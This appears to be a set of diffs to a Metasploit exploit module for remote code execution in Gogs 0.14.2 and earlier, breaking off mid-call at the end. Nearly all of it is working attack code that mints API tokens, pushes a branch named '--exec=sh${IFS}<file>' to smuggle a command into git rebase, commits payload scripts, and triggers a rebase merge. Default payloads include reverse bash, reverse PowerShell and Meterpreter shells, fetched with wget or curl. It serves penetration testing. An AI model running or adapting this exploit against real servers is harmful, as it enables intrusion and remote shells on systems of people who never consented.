+    preflight = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1')
+    }, 10)
+    fail_with(Failure::Unreachable, 'Gogs API not responding') unless preflight
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'users', datastore['USERNAME'], 'tokens'),
+      'ctype' => 'application/json',
+      'headers' => { 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) },
+      'data' => { name: "msf_#{Rex::Text.rand_text_alpha_lower(8)}" }.to_json
+    }, 20)
+    fail_with(Failure::UnexpectedReply, "API token creation failed (HTTP #{res&.code})") unless res&.code == 201
+
+    @api_token = res.get_json_document['sha1']
+    vprint_good("API token: #{@api_token}")
+  end
+
+  # ---------------------------------------------------------------
+  # Repository setup
+  # ---------------------------------------------------------------
+
+  def create_repo
+    res = api_request(
+      'POST',
+      '/api/v1/user/repos',
+      { name: @repo_name, private: true, default_branch: 'master' }.to_json
+    )
+    fail_with(Failure::UnexpectedReply, "Repo creation failed: #{res&.code}") unless res&.code == 201
+  end
+
+  def enable_rebase_merge
+    res = http_post_request(
+      "/#{@repo_path}/settings",
+      action: 'advanced',
+      enable_pulls: 'on',
+      pulls_allow_rebase: 'on'
+    )
+    fail_with(Failure::Unreachable, 'Settings page unreachable') unless res
+    fail_with(Failure::UnexpectedReply, 'Failed to enable rebase merge') unless [200, 302].include?(res.code)
+  end
+
+  def validate_existing_repo
+    res = api_request('GET', "/api/v1/repos/#{@repo_path}")
+    fail_with(Failure::BadConfig, "Repository #{@repo_path} not found or not accessible") unless res&.code == 200
+
+    repo_info = res.get_json_document
+    db = repo_info['default_branch'].to_s
+    @default_branch = db.empty? ? 'master' : db
+    vprint_status("Default branch: #{@default_branch}")
+    print_good("Repository #{@repo_path} confirmed accessible")
+  end
+
+  def try_enable_rebase
+    print_status('Attempting to enable rebase merge in repository settings')
+    settings_uri = normalize_uri(target_uri.path, @repo_path, 'settings')
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => settings_uri,
+      'keep_cookies' => true
+    }, 10)
+
+    unless res && res.code == 200
+      print_warning('Could not access repository settings (may require repo admin). Ensure rebase merge is already enabled.')
+      return
+    end
+
+    csrf_match = res.body.to_s.match(/<input [^>]*name="_csrf" [^>]*value="(?<value>[^"]+)"/)
+    csrf_match ||= res.body.to_s.match(/<input [^>]*value="(?<value>[^"]+)" [^>]*name="_csrf"/)
+    unless csrf_match
+      print_warning('Could not extract CSRF from settings page. Ensure rebase merge is already enabled.')
+      return
+    end
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => settings_uri,
+      'keep_cookies' => true,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        '_csrf' => csrf_match[:value],
+        'action' => 'advanced',
+        'enable_pulls' => 'on',
+        'pulls_allow_rebase' => 'on'
+      }
+    }, 20)
+
+    if res && [200, 302].include?(res.code)
+      print_good('Rebase merge enabled')
+    else
+      print_warning('Could not enable rebase merge. Ensure it is already enabled.')
+    end
+  end
+
+  # ---------------------------------------------------------------
+  # Branch setup via local git
+  # ---------------------------------------------------------------
+
+  def setup_branches_via_git(include_malicious: true)
+    @tmpdir = Dir.mktmpdir('msf_gogs_')
+    workdir = File.join(@tmpdir, 'work')
+    clone_url = build_clone_url
+
+    if own_repo?
+      run_git!(['init', workdir])
+      run_git!(['remote', 'add', 'origin', clone_url], workdir)
+    else
+      run_git!(['clone', clone_url, workdir])
+    end
+
+    run_git!(['config', 'user.email', Faker::Internet.email], workdir)
+    run_git!(['config', 'user.name', Faker::Internet.username], workdir)
+
+    if own_repo?
+      File.write(File.join(workdir, 'README.md'), "# #{@repo_name}\n")
+      run_git!(['add', '.'], workdir)
+      run_git!(['commit', '-m', 'init'], workdir)
+      run_git!(['push', '-u', 'origin', 'master'], workdir)
+    end
+
+    @feature_branch = "feature-#{Rex::Text.rand_text_alpha_lower(6)}"
+    run_git!(['checkout', '-b', @feature_branch], workdir)
+    File.write(File.join(workdir, 'feature.txt'), Rex::Text.rand_text_alpha(8))
+    run_git!(['add', '.'], workdir)
+    run_git!(['commit', '-m', 'feature'], workdir)
+    run_git!(['push', 'origin', @feature_branch], workdir)
+
+    # Create a divergent commit to force a rebase. For existing_repo, use
+    # the repo's default branch. Never push directly to the base branch.
+    base_branch = own_repo? ? 'master' : (@default_branch || 'master')
+    run_git!(['checkout', base_branch], workdir)
+    File.write(File.join(workdir, 'diverge.txt'), Rex::Text.rand_text_alpha(8))
+
+    # Write payload to a script file in the repo. All wrappers background
+    # the process and detach fds so sh returns and git rebase can finish.
+    if include_malicious && @payload_content
+      if @payload_content == :win_dropper
+        exe_data = generate_payload_exe
+        File.binwrite(File.join(workdir, @exe_file), exe_data)
+        File.write(File.join(workdir, @bat_file), "#{@exe_file}\n")
+        File.write(File.join(workdir, @payload_file), "cmd.exe //c #{@bat_file} </dev/null >/dev/null 2>&1 &\n")
+      elsif @bat_file
+        # sh wrapper -> cmd.exe -> .bat (//c prevents MSYS2 path conversion)
+        File.write(File.join(workdir, @payload_file), "cmd.exe //c #{@bat_file} </dev/null >/dev/null 2>&1 &\n")
+        File.write(File.join(workdir, @bat_file), @payload_content + "\n")
+      else
+        File.write(File.join(workdir, @payload_file), "(#{@payload_content}) </dev/null >/dev/null 2>&1 &\n")
+      end
+    end
+
+    run_git!(['add', '.'], workdir)
+    run_git!(['commit', '-m', 'diverge'], workdir)
+
+    if include_malicious
+      # Push malicious branch via refspec (bypasses checkout -b validation).
+      # Don't push to the base branch itself (especially for existing_repo).
+      run_git!(['push', 'origin', "HEAD:refs/heads/#{@malicious_branch}"], workdir)
+      vprint_good("Malicious branch: #{@malicious_branch}")
+    end
+
+    vprint_good("Feature branch: #{@feature_branch}")
+  end
+
+  def build_clone_url
+    user_enc = Rex::Text.uri_encode(datastore['USERNAME'])
+    pass_enc = Rex::Text.uri_encode(datastore['PASSWORD'])
+    scheme = datastore['SSL'] ? 'https' : 'http'
+    authority = Rex::Socket.to_authority(rhost, rport)
+    "#{scheme}://#{user_enc}:#{pass_enc}@#{authority}#{normalize_uri(target_uri.path, @repo_path)}.git"
+  end
+
+  def git_available?
+    _out, _err, status = Open3.capture3('git', '--version')
+    status.success?
+  rescue Errno::ENOENT
+    false
+  end
+
+  def run_git!(args, cwd = nil)
+    env = { 'GIT_TERMINAL_PROMPT' => '0' }
+    opts = {}
+    opts[:chdir] = cwd if cwd
+    stdout, stderr, status = Open3.capture3(env, 'git', *args, **opts)
+    unless status.success?
+      fail_with(Failure::Unknown, "Git #{args.first} failed: #{stderr.strip}")
+    end
+    stdout
+  end
+
+  # Non-fatal variant for cleanup operations where failure is acceptable
+  def run_git_safe(args, cwd = nil)
+    env = { 'GIT_TERMINAL_PROMPT' => '0' }
+    opts = {}
+    opts[:chdir] = cwd if cwd
+    _stdout, stderr, status = Open3.capture3(env, 'git', *args, **opts)
+    unless status.success?
+      vprint_warning("Git #{args.first} failed: #{stderr.strip}")
+      return false
+    end
+    true
+  rescue StandardError => e
+    vprint_warning("Git #{args.first} error: #{e.message}")
+    false
+  end
+
+  # ---------------------------------------------------------------
+  # Pull request and merge
+  # ---------------------------------------------------------------
+
+  def create_pull_request
+    encoded_branch = Rex::Text.uri_encode(@malicious_branch)
+    compare_uri = "/#{@repo_path}/compare/#{encoded_branch}...#{@feature_branch}"
+
+    res = http_post_request(
+      compare_uri,
+      title: Rex::Text.rand_text_alpha(6),
+      content: '',
+      assignee_id: '0',
+      milestone_id: '0'
+    )
+    fail_with(Failure::Unreachable, 'Compare page unreachable') unless res
+
+    if [302, 303].include?(res.code)
+      location = res.headers['Location'].to_s
+      pr_num = location.chomp('/').split('/').last
+      return pr_num if pr_num =~ /^\d+$/
+    end
+
+    # Fallback: find PR via API
+    res = api_request('GET', "/api/v1/repos/#{@repo_path}/pulls?state=open")
+    if res&.code == 200
+      pulls = res.get_json_document
+      return pulls.last['number'].to_s unless pulls.empty?
+    end
+
+    fail_with(Failure::UnexpectedReply, 'PR creation failed')
+  end
+
+  def trigger_rebase_merge
+    merge_uri = "/#{@repo_path}/pulls/#{@pr_number}/merge"
+
+    pr_uri = "/#{@repo_path}/pulls/#{@pr_number}"
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, pr_uri),
+      'keep_cookies' => true
+    )
+    csrf = extract_csrf(res)
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, merge_uri),
+      'keep_cookies' => true,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_get' => { 'merge_style' => 'rebase_before_merging' },
+      'vars_post' => {
+        '_csrf' => csrf,
+        'commit_description' => ''
+      }
+    }, 5)
+    # May return 500 (expected on exec), 302 (merged), or timeout (blocking shell)
+
+    # Reset connection pool since the merge POST may have timed out
+    disconnect
+  end
+
+  # ---------------------------------------------------------------
+  # HTTP helpers
+  # ---------------------------------------------------------------
+
+  def api_request(method, uri, body = nil)
+    opts = {
+      'method' => method,
+      'uri' => normalize_uri(target_uri.path, uri),
+      'headers' => { 'Authorization' => "token #{@api_token}" }
+    }
+    if body
+      opts['ctype'] = 'application/json'
+      opts['data'] = body
+    end
+    send_request_cgi(opts, 20)
+  end
+
+  def http_post_request(uri, opts = {})
+    full_uri = normalize_uri(target_uri.path, uri)
+    csrf = get_csrf(full_uri)
+    timeout = opts.delete(:timeout) || 20
+
+    post_data = { _csrf: csrf }.merge(opts)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => full_uri,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'keep_cookies' => true,
+      'vars_post' => post_data
+    }, timeout)
+  end
+
+  def get_csrf(uri)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => uri,
+      'keep_cookies' => true
+    )
+    fail_with(Failure::Unreachable, "Unable to reach #{uri}") unless res
+
+    extract_csrf(res)
+  end
+
+  def extract_csrf(res)
+    fail_with(Failure::Unreachable, 'No response to extract CSRF from') unless res
+
+    match = res.body.to_s.match(/<input [^>]*name="_csrf" [^>]*value="(?<value>[^"]+)"/)
+    match ||= res.body.to_s.match(/<input [^>]*value="(?<value>[^"]+)" [^>]*name="_csrf"/)
+    match ||= res.body.to_s.match(/name="_csrf"\s+(?:content|value)="(?<value>[^"]+)"/)
+    fail_with(Failure::NotFound, 'CSRF token not found in response') unless match
+
+    match[:value]
+  end
+
+  def basic_auth(user, pass)
+    "Basic #{Rex::Text.encode_base64("#{user}:#{pass}")}"
+  end
+
+  # ---------------------------------------------------------------
+  # Cleanup
+  # ---------------------------------------------------------------
+
+  def cleanup
+    super
+
+    if @need_cleanup
+      begin
+        disconnect
+      rescue ::Rex::ConnectionError
+        nil
+      end
+
+      if own_repo?
+        cleanup_own_repo
+      else
+        cleanup_existing_repo
+      end
+    end
+
+    # Clean up local temp directory AFTER remote cleanup (existing_repo
+    # branch deletion uses the local git workdir for push operations)
+    if @tmpdir && File.directory?(@tmpdir)
+      FileUtils.rm_rf(@tmpdir)
+      vprint_status('Local temp directory cleaned up')
+    end
+
+    # Gogs API has no token deletion endpoint, so warn the user
+    if @api_token
+      print_warning('API token "msf_*" persists on the target (Gogs API does not support token deletion)')
+    end
+  end
+
+  def cleanup_own_repo
+    print_status("Cleaning up - deleting repository #{@repo_name}")
+
+    send_request_cgi({
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, '/api/v1/repos/', @repo_path),
+      'headers' => { 'Authorization' => "token #{@api_token}" }
+    }, 5)
+
+    verify = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/api/v1/repos/', @repo_path),
+      'headers' => { 'Authorization' => "token #{@api_token}" }
+    }, 5)
+
+    if verify&.code == 404
+      print_good("Repository #{@repo_name} deleted")
+    elsif verify.nil?
+      print_warning("Could not confirm deletion. Delete #{@repo_path} manually if it still exists.")
+    else
+      print_warning("Repository may still exist. Delete #{@repo_path} manually.")
+    end
+  rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e
+    print_warning("Cleanup failed: #{e.message}. Delete #{@repo_path} manually.")
+  end
+
+  def cleanup_existing_repo
+    print_status("Cleaning up artifacts from #{@repo_path}")
+    delete_remote_branches
+    close_pull_request
+  rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e
+    print_warning("Cleanup failed: #{e.message}")
+    print_warning("Manually delete branches and close PR ##{@pr_number} in #{@repo_path}")
+  end
+
+  def delete_remote_branches
+    workdir = @tmpdir ? File.join(@tmpdir, 'work') : nil
+    return unless workdir && File.directory?(workdir)
+
+    if @malicious_branch
+      vprint_status("Deleting malicious branch from #{@repo_path}")
+      if run_git_safe(['push', 'origin', '--delete', "refs/heads/#{@malicious_branch}"], workdir)
+        print_good('Malicious branch deleted')
+      else
+        print_warning("Could not delete malicious branch. Delete it manually from #{@repo_path}")
+      end
+    end
+
+    if @feature_branch
+      vprint_status("Deleting feature branch from #{@repo_path}")
+      if run_git_safe(['push', 'origin', '--delete', @feature_branch], workdir)
+        print_good('Feature branch deleted')
+      else
+        print_warning("Could not delete feature branch \"#{@feature_branch}\" from #{@repo_path}")
+      end
+    end
+  end
+
+  def close_pull_request
+    return unless @pr_number
+
+    # GET the PR page for CSRF (must use /pulls/ path; /issues/ redirects)
+    pr_page = normalize_uri(target_uri.path, @repo_path, 'pulls', @pr_number)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => pr_page,
+      'keep_cookies' => true
+    }, 10)
+
+    unless res
+      print_warning("Could not load PR page to close PR ##{@pr_number}")
+      return
+    end
+
+    # Extract CSRF without fail_with (cleanup must not abort)
+    csrf_match = res.body.to_s.match(/<input [^>]*name="_csrf" [^>]*value="(?<value>[^"]+)"/)
+    csrf_match ||= res.body.to_s.match(/<input [^>]*value="(?<value>[^"]+)" [^>]*name="_csrf"/)
+    csrf_match ||= res.body.to_s.match(/name="_csrf"\s+(?:content|value)="(?<value>[^"]+)"/)
+    unless csrf_match
+      print_warning("Could not find CSRF token to close PR ##{@pr_number}")
+      return
+    end
+
+    comment_uri = normalize_uri(target_uri.path, @repo_path, 'issues', @pr_number, 'comments')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => comment_uri,
+      'keep_cookies' => true,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        '_csrf' => csrf_match[:value],
+        'status' => 'close',
+        'content' => ''
+      }
+    }, 10)
+
+    if res && [200, 302].include?(res.code)
+      print_good("PR ##{@pr_number} closed")
+    else
+      print_warning("Could not close PR ##{@pr_number}. Close it manually in #{@repo_path}")
+    end
+  rescue StandardError => e
+    print_warning("Failed to close PR: #{e.message}")
+  end
+end

--- a/modules/exploits/multi/http/gogs_rebase_rce.rb
+++ b/modules/exploits/multi/http/gogs_rebase_rce.rb
@@ -176,25 +176,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     service_info = version ? "Gogs Git Service #{version}" : 'Gogs Git Service'
-    report_service(
-      host: rhost,
-      port: rport,
-      proto: 'tcp',
-      name: 'gogs',
-      info: service_info,
-      parents: {
-        host: rhost,
-        port: rport,
-        proto: 'tcp',
-        name: datastore['SSL'] ? 'https' : 'http',
-        parents: {
-          host: rhost,
-          port: rport,
-          proto: 'tcp',
-          name: 'tcp'
-        }
-      }
-    )
+    report_gogs_service(service_info)
 
     if version
       ver = Rex::Version.new(version)
@@ -629,15 +611,19 @@ class MetasploitModule < Msf::Exploit::Remote
     "Basic #{Rex::Text.encode_base64("#{user}:#{pass}")}"
   end
 
-  # Returns a service object for linking to report_vuln
+  # Returns a service object for linking to report_vuln.
+  # Builds the full layered service hierarchy: gogs -> [ssl ->] http -> tcp
   def report_gogs_service(info)
-    report_service(
+    base_opts = {
       host: rhost,
       port: rport,
-      proto: 'tcp',
-      name: 'gogs',
-      info: info
-    )
+      proto: 'tcp'
+    }
+    gogs_srv = base_opts.merge(name: 'gogs', info: info)
+    http_srv = base_opts.merge(name: 'http', parents: base_opts.merge(name: 'tcp'))
+    gogs_srv[:parents] = datastore['SSL'] ? base_opts.merge(name: 'ssl', parents: http_srv) : http_srv
+
+    report_service(gogs_srv)
   end
 
   # ---------------------------------------------------------------

--- a/modules/exploits/multi/http/gogs_rebase_rce.rb
+++ b/modules/exploits/multi/http/gogs_rebase_rce.rb
@@ -161,7 +161,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     return CheckCode::Unknown('Target did not respond.') unless res
 
-    unless res.body.to_s.match(%r{<meta +name="author" +content="Gogs"})
+    unless res.body.to_s.match(/<meta +name="author" +content="Gogs"/)
       return CheckCode::Safe('Target does not appear to be running Gogs.')
     end
 

--- a/modules/exploits/multi/http/gogs_rebase_rce.rb
+++ b/modules/exploits/multi/http/gogs_rebase_rce.rb
@@ -161,7 +161,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     return CheckCode::Unknown('Target did not respond.') unless res
 
-    unless res.body.to_s.match(%r{<meta +name="author" +content="Gogs" */>})
+    unless res.body.to_s.match(%r{<meta +name="author" +content="Gogs"})
       return CheckCode::Safe('Target does not appear to be running Gogs.')
     end
 

--- a/modules/exploits/multi/http/gogs_rebase_rce.rb
+++ b/modules/exploits/multi/http/gogs_rebase_rce.rb
@@ -165,12 +165,21 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Safe('Target does not appear to be running Gogs.')
     end
 
+    # Fingerprint via static asset commit hash (unauthenticated, all versions)
+    version = nil
+    hash_match = res.body.to_s.match(/gogs\.min\.css\?v=([a-f0-9]{40})/)
+    if hash_match
+      version = COMMIT_TO_VERSION[hash_match[1]]
+      vprint_status("Unknown Gogs commit hash: #{hash_match[1]}") unless version
+    end
+
+    service_info = version ? "Gogs Git Service #{version}" : 'Gogs Git Service'
     report_service(
       host: rhost,
       port: rport,
       proto: 'tcp',
       name: 'Gogs Git Service',
-      resource: { base_url: normalize_uri(target_uri.path) },
+      info: service_info,
       parents: {
         host: rhost,
         port: rport,
@@ -185,19 +194,13 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    # Fingerprint via static asset commit hash (unauthenticated, all versions)
-    hash_match = res.body.to_s.match(/gogs\.min\.css\?v=([a-f0-9]{40})/)
-    if hash_match
-      version = COMMIT_TO_VERSION[hash_match[1]]
-      if version
-        ver = Rex::Version.new(version)
-        if ver <= Rex::Version.new('0.14.2')
-          return CheckCode::Appears("Gogs #{version} detected.")
-        else
-          return CheckCode::Safe("Gogs #{version} detected.")
-        end
+    if version
+      ver = Rex::Version.new(version)
+      if ver <= Rex::Version.new('0.14.2')
+        return CheckCode::Appears("Gogs #{version} detected.")
+      else
+        return CheckCode::Safe("Gogs #{version} detected.")
       end
-      vprint_status("Unknown Gogs commit hash: #{hash_match[1]}")
     end
 
     CheckCode::Detected('Gogs detected, but could not determine version.')

--- a/modules/exploits/multi/http/gogs_rebase_rce.rb
+++ b/modules/exploits/multi/http/gogs_rebase_rce.rb
@@ -85,7 +85,8 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
               'DefaultOptions' => {
-                'FETCH_COMMAND' => 'WGET'
+                'FETCH_COMMAND' => 'WGET',
+                'FETCH_WRITABLE_DIR' => '/tmp/'
               }
             }
           ],

--- a/modules/exploits/multi/http/gogs_rebase_rce.rb
+++ b/modules/exploits/multi/http/gogs_rebase_rce.rb
@@ -5,17 +5,12 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-# Open3 is used to drive local git operations (clone, push, branch creation).
-# There is no Rex or MSF library for local git CLI interaction.
-require 'open3'
-
 class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -38,15 +33,12 @@ class MetasploitModule < Msf::Exploit::Remote
           rebase merge, and operates entirely within their own account.
           Any authenticated user who can create repositories (the default)
           can exploit this with no interaction from other users required.
-          Supports all targets including CmdStager-based droppers.
 
           - existing_repo: The attacker exploits a repository they already
           have write and merge access to, where "Rebase before merging"
           is enabled (or the attacker has repo admin permissions to
           enable it). This path is useful on instances where repository
-          creation is restricted. Only command targets are supported
-          (not droppers) since CmdStager requires multiple merge cycles
-          which would be too noisy on a shared repository.
+          creation is restricted.
 
           Both methods use git to push divergent branches (including the
           malicious --exec= branch), open a pull request, and trigger a
@@ -81,29 +73,17 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2026-03-17',
         'License' => MSF_LICENSE,
         'Platform' => ['unix', 'linux', 'win'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Arch' => ARCH_CMD,
         'Privileged' => false,
         'Targets' => [
           [
             'Unix Command',
             {
-              'Platform' => 'unix',
+              'Platform' => ['linux', 'unix'],
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_bash'
-              }
-            }
-          ],
-          [
-            'Linux Dropper',
-            {
-              'Platform' => 'linux',
-              'Arch' => [ARCH_X86, ARCH_X64],
-              'Type' => :linux_dropper,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
-                'CMDSTAGER::FLAVOR' => :wget
+                'FETCH_COMMAND' => 'WGET'
               }
             }
           ],
@@ -114,18 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => ARCH_CMD,
               'Type' => :win_cmd,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/windows/reverse_powershell'
-              }
-            }
-          ],
-          [
-            'Windows Dropper',
-            {
-              'Platform' => 'win',
-              'Arch' => [ARCH_X86, ARCH_X64],
-              'Type' => :win_dropper,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+                'FETCH_COMMAND' => 'CURL'
               }
             }
           ]
@@ -152,8 +121,8 @@ class MetasploitModule < Msf::Exploit::Remote
         true, 'Exploit method: own_repo creates a temporary repo, existing_repo targets a repo the attacker has write access to',
         'own_repo', ['own_repo', 'existing_repo']
       ]),
-      OptString.new('REPO_OWNER', [false, 'Owner of the target repository (required for existing_repo)', nil]),
-      OptString.new('REPO_NAME', [false, 'Name of the target repository (required for existing_repo)', nil]),
+      OptString.new('REPO_OWNER', [false, 'Owner of the target repository (required for existing_repo)', nil], conditions: %w[EXPLOIT_METHOD == existing_repo]),
+      OptString.new('REPO_NAME', [false, 'Name of the target repository (required for existing_repo)', nil], conditions: %w[EXPLOIT_METHOD == existing_repo]),
       OptBool.new('ENABLE_REBASE', [
         true, 'Enable rebase merge in repository settings (existing_repo requires repo admin access)', true
       ]),
@@ -200,8 +169,21 @@ class MetasploitModule < Msf::Exploit::Remote
       host: rhost,
       port: rport,
       proto: 'tcp',
-      name: 'http',
-      info: 'Gogs Git Service'
+      name: 'gogs',
+      info: 'Gogs Git Service',
+      parents: {
+        name: datastore['SSL'] ? 'https' : 'http',
+        host: rhost,
+        port: rport,
+        proto: 'tcp',
+        parents: {
+          name: 'tcp',
+          host: rhost,
+          port: rport,
+          proto: 'tcp',
+          parents: nil
+        }
+      }
     )
 
     # Fingerprint via static asset commit hash (unauthenticated, all versions)
@@ -228,10 +210,6 @@ class MetasploitModule < Msf::Exploit::Remote
     unless own_repo?
       fail_with(Failure::BadConfig, 'REPO_OWNER is required when EXPLOIT_METHOD is existing_repo') if datastore['REPO_OWNER'].blank?
       fail_with(Failure::BadConfig, 'REPO_NAME is required when EXPLOIT_METHOD is existing_repo') if datastore['REPO_NAME'].blank?
-
-      if %i[linux_dropper win_dropper].include?(target['Type'])
-        fail_with(Failure::BadConfig, 'Dropper targets require EXPLOIT_METHOD=own_repo (CmdStager needs multiple merge cycles on the repo)')
-      end
     end
 
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
@@ -299,63 +277,7 @@ class MetasploitModule < Msf::Exploit::Remote
         refs: references
       )
       print_good('Rebase merge triggered, waiting for shell...')
-    when :win_dropper
-      # Commit the exe directly to the repo. CmdStager won't work here because
-      # the HTTP server shuts down before the rebase chain finishes fetching.
-      rand_name = Rex::Text.rand_text_alpha_lower(6)
-      @exe_file = ".#{rand_name}.exe"
-      @bat_file = ".#{rand_name}.bat"
-      @payload_file = ".#{rand_name}"
-      @payload_content = :win_dropper # sentinel for setup_branches_via_git
-      @malicious_branch = "--exec=sh${IFS}#{@payload_file}"
-
-      print_status('Pushing branches via git (with payload binary)')
-      setup_branches_via_git
-      print_good('Branches pushed')
-
-      print_status('Creating pull request')
-      @pr_number = create_pull_request
-      print_good("PR ##{@pr_number} created")
-
-      print_status('Triggering rebase merge')
-      trigger_rebase_merge
-      print_good('Rebase merge triggered, waiting for session...')
-    when :linux_dropper
-      print_status('Pushing base branches via git')
-      setup_branches_via_git(include_malicious: false)
-      print_good('Base branches pushed')
-
-      print_status('Delivering payload via CmdStager')
-      execute_cmdstager
     end
-  end
-
-  def execute_command(cmd, _opts = {})
-    fail_with(Failure::BadConfig, 'CmdStager is not supported with EXPLOIT_METHOD=existing_repo') unless own_repo?
-
-    @exec_counter ||= 0
-    @exec_counter += 1
-
-    workdir = File.join(@tmpdir, 'work')
-
-    filename = ".#{Rex::Text.rand_text_alpha_lower(6)}"
-    File.write(File.join(workdir, filename), "(#{cmd}) </dev/null >/dev/null 2>&1 &\n")
-    run_git!(['add', filename], workdir)
-    @malicious_branch = "--exec=sh${IFS}#{filename}"
-
-    run_git!(['commit', '-m', "u#{@exec_counter}"], workdir)
-    run_git!(['push', 'origin', 'master'], workdir)
-
-    run_git!(['push', 'origin', "HEAD:refs/heads/#{@malicious_branch}"], workdir)
-    vprint_good("Malicious branch: #{@malicious_branch}")
-
-    print_status('Creating pull request')
-    @pr_number = create_pull_request
-    print_good("PR ##{@pr_number} created")
-
-    print_status('Triggering rebase merge')
-    trigger_rebase_merge
-    print_good('Rebase merge triggered')
   end
 
   # ---------------------------------------------------------------
@@ -373,19 +295,19 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def create_api_token
-    preflight = send_request_cgi({
+    preflight = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'api', 'v1')
-    }, 10)
+    )
     fail_with(Failure::Unreachable, 'Gogs API not responding') unless preflight
 
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'users', datastore['USERNAME'], 'tokens'),
       'ctype' => 'application/json',
       'headers' => { 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) },
       'data' => { name: "msf_#{Rex::Text.rand_text_alpha_lower(8)}" }.to_json
-    }, 20)
+    )
     fail_with(Failure::UnexpectedReply, "API token creation failed (HTTP #{res&.code})") unless res&.code == 201
 
     @api_token = res.get_json_document['sha1']
@@ -431,36 +353,36 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Attempting to enable rebase merge in repository settings')
     settings_uri = normalize_uri(target_uri.path, @repo_path, 'settings')
 
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'GET',
       'uri' => settings_uri,
       'keep_cookies' => true
-    }, 10)
+    )
 
     unless res && res.code == 200
       print_warning('Could not access repository settings (may require repo admin). Ensure rebase merge is already enabled.')
       return
     end
 
-    csrf_match = res.body.to_s.match(/<input [^>]*name="_csrf" [^>]*value="(?<value>[^"]+)"/)
-    csrf_match ||= res.body.to_s.match(/<input [^>]*value="(?<value>[^"]+)" [^>]*name="_csrf"/)
-    unless csrf_match
+    doc = res.get_html_document
+    csrf = doc.at_xpath("//input[@name='_csrf']/@value")&.text
+    unless csrf
       print_warning('Could not extract CSRF from settings page. Ensure rebase merge is already enabled.')
       return
     end
 
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'POST',
       'uri' => settings_uri,
       'keep_cookies' => true,
       'ctype' => 'application/x-www-form-urlencoded',
       'vars_post' => {
-        '_csrf' => csrf_match[:value],
+        '_csrf' => csrf,
         'action' => 'advanced',
         'enable_pulls' => 'on',
         'pulls_allow_rebase' => 'on'
       }
-    }, 20)
+    )
 
     if res && [200, 302].include?(res.code)
       print_good('Rebase merge enabled')
@@ -510,17 +432,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Write payload to a script file in the repo. All wrappers background
     # the process and detach fds so sh returns and git rebase can finish.
-    if include_malicious && @payload_content
-      if @payload_content == :win_dropper
-        exe_data = generate_payload_exe
-        File.binwrite(File.join(workdir, @exe_file), exe_data)
-        File.write(File.join(workdir, @bat_file), "#{@exe_file}\n")
-        File.write(File.join(workdir, @payload_file), "cmd.exe //c #{@bat_file} </dev/null >/dev/null 2>&1 &\n")
-      elsif @bat_file
+    if include_malicious
+      if @bat_file
         # sh wrapper -> cmd.exe -> .bat (//c prevents MSYS2 path conversion)
         File.write(File.join(workdir, @payload_file), "cmd.exe //c #{@bat_file} </dev/null >/dev/null 2>&1 &\n")
         File.write(File.join(workdir, @bat_file), @payload_content + "\n")
-      else
+      elsif @payload_content
         File.write(File.join(workdir, @payload_file), "(#{@payload_content}) </dev/null >/dev/null 2>&1 &\n")
       end
     end
@@ -655,22 +572,21 @@ class MetasploitModule < Msf::Exploit::Remote
       opts['ctype'] = 'application/json'
       opts['data'] = body
     end
-    send_request_cgi(opts, 20)
+    send_request_cgi(opts)
   end
 
   def http_post_request(uri, opts = {})
     full_uri = normalize_uri(target_uri.path, uri)
     csrf = get_csrf(full_uri)
-    timeout = opts.delete(:timeout) || 20
 
     post_data = { _csrf: csrf }.merge(opts)
-    send_request_cgi({
+    send_request_cgi(
